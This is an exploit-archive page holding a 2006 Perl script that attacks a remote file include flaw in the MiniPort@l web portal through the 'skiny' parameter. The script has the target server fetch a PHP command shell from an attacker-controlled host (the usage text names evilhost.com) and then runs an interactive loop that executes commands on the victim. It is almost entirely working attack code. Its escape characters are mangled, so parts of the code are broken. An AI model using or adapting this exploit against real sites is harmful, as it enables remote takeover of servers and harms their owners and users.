[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : MiniPort@l <= 0.1.5 beta (skiny) Remote File Include Vulnerability
# Published : 2006-09-11
# Author : Kacper
# Previous Title : Signkorn Guestbook <= 1.3 (dir_path) Remote File Include Vulnerability
# Next Title : OPENi-CMS <= 1.0.1beta (config) Remote File Include Vulnerability


#!/usr/bin/perl

use LWP::UserAgent;

#/*
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#+
#-   - - [DEVIL TEAM THE BEST POLISH TEAM] - -
#+
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#+
#- MiniPort@l <= 2.0 (skiny) Remote File Include Exploit
#+
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#+
#- [Script name: MiniPort@l v. 0.1.5
#- [Script site: http://mlodylis.xcx.pl/
#+
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#+
#-          Find by: Kacper (a.k.a Rahim)
#+
#-          Contact: kacper1964@yahoo.pl
#-                        or
#-           http://www.rahim.webd.pl/
#+
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#+
#- Special Greetz: DragonHeart ;-)
#- Ema: Leito, Leon, Adam, DeathSpeed, Drzewko, pepi, mivus ;]
#-
#!@ Przyjazni nie da sie zamienic na marne korzysci @!
#+
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#+
#-            Z Dedykacja dla osoby,
#-         bez ktorej nie mogl bym zyc...
#-           K.C:* J.M (a.k.a Magaja)
#+
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# usage:
# perl exploit.pl <MiniPort@l Locaction> <shell location> <shell cmd>
#
# perl exploit.pl http://site.com/[MiniPort@l_Path]/ http://site.com/cmd.txt cmd
#
# cmd shell example: <?passthru($_GET[cmd]);?>
#
# cmd shell variable: ($_GET[cmd]);
###################################################




$sciezka = $ARGV[0];

$sciezkacmd = $ARGV[1];

$komenda = $ARGV[2];

if($sciezka!~/http:/// || $sciezkacmd!~/http:/// || !$komenda){usage()}

head();

while()
{
print "[shell] $";
while(<STDIN>)
{
$cmd=$_;
chomp($cmd);

$xpl = LWP::UserAgent->new() or die;

$req = HTTP::Request->new(GET=>$sciezka.'dodatki/menu.php?skiny='.$sciezkacmd.'?&'.$komenda.'='.$cmd)or die "nCouldNot connectn";
$res = $xpl->request($req);

$return = $res->content;
$return =~ tr/[n]/[&#234;]/;

if (!$cmd) {print "nEnter a Commandnn"; $return ="";}

elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot executea blank command in <b>/)

{print "nCould Not Connect to cmd Host or Invalid Command Variablen";exit}

elsif ($return =~/^<br./>.<b>Warning/) {print "nInvalid Commandnn"}

if($return =~ /(.+)<br./>.<b>Warning.(.+)<br./>.<b>Warning/)
{

$finreturn = $1;
$finreturn=~ tr/[&#234;]/[n]/;
print "rn$finreturnnr";
last;


}
else {print "[shell] $";}}}last;

sub head()
{
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~n";
print "+          - - [DEVIL TEAM THE BEST POLISH TEAM] - -         +n";
print "+MiniPort@l <= 2.0 (root_dir) Remote File Include Exploit+n";
print "+                http://www.rahim.webd.pl/                   +n";
print "+                Find by: Kacper (a.k.a Rahim)               +n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~n";
}
sub usage()
{
head();
print " Usage: perl exploit.pl <MiniPort@l Locaction> <shell location> <shell cmd>rnn";
print " <MiniPort@l Locaction> - Full path to MiniPort@l ex: http://www.site.com/MiniPort@l/rn";
print " <shell location> - Path to cmd Shell e.g http://www.evilhost.com/cmd.txtrn";
print " <shell cmd> - Command variable used in php shell rn";
print " ============================================================================rn";
print "                         Find by: Kacper (a.k.a Rahim)                       rn";
print "                           http://www.rahim.webd.pl/                         rn";
print "                          Special Greetz: DragonHeart ;-)                    rn";
print " ============================================================================rn";

exit();
}

#Pozdrawiam wszystkich ;-)

# www.Syue.com [2006-09-11]